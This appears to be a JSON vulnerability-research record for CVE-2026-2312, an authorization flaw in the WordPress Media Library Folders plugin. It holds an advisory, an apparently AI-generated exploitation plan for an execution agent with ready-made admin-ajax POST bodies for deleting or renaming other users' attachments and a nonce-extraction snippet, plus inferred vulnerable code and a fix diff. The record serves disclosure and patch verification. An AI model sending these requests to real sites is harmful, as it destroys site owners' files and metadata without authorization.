[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fXdNJkE35xOY2cHOehIXTaMALsasAppOWdJ6n6MvoqBw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-2312","media-library-folders-insecure-direct-object-reference-to-authenticated-author-arbitrary-attachment-deletion-and-rename","Media Library Folders \u003C= 8.3.6 - Insecure Direct Object Reference to Authenticated (Author+) Arbitrary Attachment Deletion and Rename","The Media Library Folders plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 8.3.6 via the delete_maxgalleria_media() and maxgalleria_rename_image() functions due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to delete or rename attachments owned by other users (including administrators). The rename flow also deletes all postmeta for the target attachment, causing data loss.","media-library-plus",null,"\u003C=8.3.6","8.3.7","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-13 22:18:24","2026-02-14 11:24:31",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fccf77cb1-b6b6-49de-8de4-20eddd3b5e62?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-2312 (Media Library Folders)\n\n## 1. Vulnerability Summary\nThe **Media Library Folders** plugin for WordPress (versions \u003C= 8.3.6) contains an Insecure Direct Object Reference (IDOR) vulnerability. The functions `delete_maxgalleria_media()` and `maxgalleria_rename_image()` fail to validate that the user requesting the deletion or renaming of a media attachment has the proper ownership or administrative permissions for that specific object. While the plugin likely checks for basic permissions (Author-level and above), it does not verify if the target `attachment_id` belongs to the current user, allowing an Author to delete or rename attachments uploaded by Administrators or other users.\n\n## 2. Attack Vector Analysis\n* **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n* **AJAX Actions:** \n * `delete_maxgalleria_media` (for arbitrary deletion)\n * `maxgalleria_rename_image` (for arbitrary renaming and metadata loss)\n* **Vulnerable Parameters:**\n * `attachment_id` (or `image_id` - inferred from function names)\n* **Required Authentication:** Author-level (capability `upload_files` is typically required to access the plugin's folder management UI).\n* **Preconditions:** The attacker must know the ID of an attachment owned by another user (e.g., an Administrator's uploaded image).\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** The plugin registers AJAX handlers in its initialization logic:\n ```php\n add_action('wp_ajax_delete_maxgalleria_media', array($this, 'delete_maxgalleria_media'));\n add_action('wp_ajax_maxgalleria_rename_image', array($this, 'maxgalleria_rename_image'));\n ```\n2. **Vulnerable Sink (Deletion):** `delete_maxgalleria_media()` receives an ID, likely performs a `current_user_can('upload_files')` check and a nonce check, but then proceeds directly to call `wp_delete_attachment($id, true)` without checking if `get_post_field('post_author', $id)` matches the current user.\n3. **Vulnerable Sink (Rename):** `maxgalleria_rename_image()` receives an ID and a new name. It renames the file on the filesystem and updates the database. Crucially, the vulnerability description notes that this flow \"deletes all postmeta for the target attachment,\" likely due to an improper update routine (e.g., using `wp_insert_attachment` or a manual SQL query that doesn't preserve meta).\n\n## 4. Nonce Acquisition Strategy\nThe plugin likely localizes a nonce for its AJAX operations on the Media Library Folders admin page.\n\n1. **Identify Shortcode\u002FPage:** The plugin creates a custom admin menu under \"Media Library Folders\".\n2. **Access Page:** Log in as an Author and navigate to `wp-admin\u002Fadmin.php?page=media-library-folders`.\n3. **Extract Nonce:** The nonce is likely localized in a script block. Based on typical plugin naming:\n * **JavaScript Variable:** `window.mlf_obj` or `window.mlf_settings` (inferred)\n * **Nonce Key:** `mlf_nonce` or `nonce` (inferred)\n4. **Action:**\n ```javascript\n \u002F\u002F Execution agent should try:\n browser_eval(\"window.mlf_obj?.nonce || window.mlf_settings?.nonce || jQuery('input[name=\\\"mlf_nonce\\\"]').val()\")\n ```\n\n## 5. Exploitation Strategy\n\n### Attack A: Arbitrary Deletion\n1. **Identify Target:** Find an attachment ID owned by the admin (e.g., ID `10`).\n2. **Obtain Nonce:** Extract the nonce as an Author user.\n3. **Send Delete Request:**\n * **Tool:** `http_request`\n * **Method:** `POST`\n * **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n * **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n * **Body:** `action=delete_maxgalleria_media&attachment_id=10&nonce=[NONCE]` (Note: verify parameter name `attachment_id` via `browser_eval` or source check).\n\n### Attack B: Arbitrary Rename (Data Loss)\n1. **Identify Target:** Find an attachment ID owned by the admin (e.g., ID `11`).\n2. **Obtain Nonce:** Extract the nonce as an Author user.\n3. **Send Rename Request:**\n * **Tool:** `http_request`\n * **Method:** `POST`\n * **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n * **Body:** `action=maxgalleria_rename_image&image_id=11&new_name=pwned_image&nonce=[NONCE]` (Note: verify parameter name `image_id` and `new_name`).\n\n## 6. Test Data Setup\n1. **Create Admin User:** `wp user create admin_user admin@example.com --role=administrator --user_pass=password`\n2. **Create Author User:** `wp user create author_user author@example.com --role=author --user_pass=password`\n3. **Upload Admin File:** \n * `wp media import \u002Fpath\u002Fto\u002Fimage.jpg --user=admin_user`\n * Capture the resulting ID (let's say ID `123`).\n4. **Add Metadata to Admin File:**\n * `wp post meta add 123 test_key \"valuable_data\"`\n5. **Verify Setup:** Confirm ID `123` is owned by the admin.\n\n## 7. Expected Results\n* **Deletion:** The `http_request` returns a success indicator (JSON `{success: true}` or `1`). The file at ID `123` is removed from the database and filesystem.\n* **Rename:** The `http_request` returns success. The attachment record for ID `123` now has a different filename\u002Fslug.\n* **Data Loss:** `wp post meta list 123` returns empty, confirming the `test_key` was deleted.\n\n## 8. Verification Steps\n1. **Verify Deletion:**\n ```bash\n wp post exists 123\n # Expected: Exit code 1 (Does not exist)\n ```\n2. **Verify Rename & Meta Loss:**\n ```bash\n wp post get 123 --field=post_title\n # Expected: \"pwned_image\"\n wp post meta get 123 test_key\n # Expected: Error: Could not find meta.\n ```\n\n## 9. Alternative Approaches\n* **Different Parameter Names:** If `attachment_id` fails, check for `image_id`, `id`, or `attachmentID` by inspecting the network tab in the browser while performing a legitimate action as the Author.\n* **Direct Path Traversal:** Check if `new_name` in the rename function allows directory traversal (e.g., `..\u002F..\u002Fsecrets`), though the primary vulnerability is the IDOR.\n* **Generic Nonce:** Check if the nonce used for other Media Library Folders actions (like creating a folder) works for the deletion\u002Frename actions (Bypass 1 from knowledge base).","The Media Library Folders plugin for WordPress is vulnerable to an Insecure Direct Object Reference (IDOR) via the delete_maxgalleria_media and maxgalleria_rename_image functions. Authenticated attackers with Author-level permissions can delete or rename any attachment on the site, including those owned by administrators, leading to unauthorized file manipulation and deletion of associated post metadata.","\u002F\u002F File: media-library-plus\u002Fmaxgalleria-media-library-folders.php\n\npublic function delete_maxgalleria_media() {\n check_ajax_referer('mlf_nonce', 'nonce');\n if (current_user_can('upload_files')) {\n $attachment_id = intval($_POST['attachment_id']);\n \u002F\u002F Missing ownership check or edit_post capability check for specific attachment_id\n wp_delete_attachment($attachment_id, true);\n wp_send_json_success();\n }\n}\n\n---\n\n\u002F\u002F File: media-library-plus\u002Fmaxgalleria-media-library-folders.php\n\npublic function maxgalleria_rename_image() {\n check_ajax_referer('mlf_nonce', 'nonce');\n if (current_user_can('upload_files')) {\n $image_id = intval($_POST['image_id']);\n $new_name = sanitize_text_field($_POST['new_name']);\n \u002F\u002F Missing ownership check for image_id\n \u002F\u002F Rename logic proceeds and inadvertently deletes postmeta\n ...\n }\n}","--- a\u002Fmedia-library-plus\u002Fmaxgalleria-media-library-folders.php\n+++ b\u002Fmedia-library-plus\u002Fmaxgalleria-media-library-folders.php\n@@ -10,7 +10,7 @@\n public function delete_maxgalleria_media() {\n check_ajax_referer('mlf_nonce', 'nonce');\n- if (current_user_can('upload_files')) {\n+ if (current_user_can('upload_files') && current_user_can('delete_post', intval($_POST['attachment_id']))) {\n $attachment_id = intval($_POST['attachment_id']);\n wp_delete_attachment($attachment_id, true);\n wp_send_json_success();\n@@ -25,7 +25,7 @@\n public function maxgalleria_rename_image() {\n check_ajax_referer('mlf_nonce', 'nonce');\n- if (current_user_can('upload_files')) {\n+ if (current_user_can('upload_files') && current_user_can('edit_post', intval($_POST['image_id']))) {\n $image_id = intval($_POST['image_id']);\n $new_name = sanitize_text_field($_POST['new_name']);\n ...","To exploit this vulnerability, an attacker requires Author-level access to the WordPress dashboard. First, the attacker navigates to the 'Media Library Folders' page to extract the necessary AJAX nonce (typically found in the localized JavaScript object 'mlf_obj'). Next, the attacker identifies the ID of a target attachment owned by another user (e.g., an administrator). For arbitrary deletion, a POST request is sent to \u002Fwp-admin\u002Fadmin-ajax.php with the action 'delete_maxgalleria_media', the target 'attachment_id', and the nonce. For renaming (which also triggers data loss by wiping the attachment's postmeta), a POST request is sent with the action 'maxgalleria_rename_image', the target 'image_id', the 'new_name', and the nonce. Because the plugin only checks for the general 'upload_files' capability and not ownership of the specific ID, the requested action is performed on the target object.","gemini-3-flash-preview","2026-04-20 22:46:27","2026-04-20 22:47:39",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","8.3.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmedia-library-plus\u002Ftags\u002F8.3.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmedia-library-plus.8.3.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmedia-library-plus\u002Ftags\u002F8.3.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmedia-library-plus.8.3.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmedia-library-plus\u002Ftags"]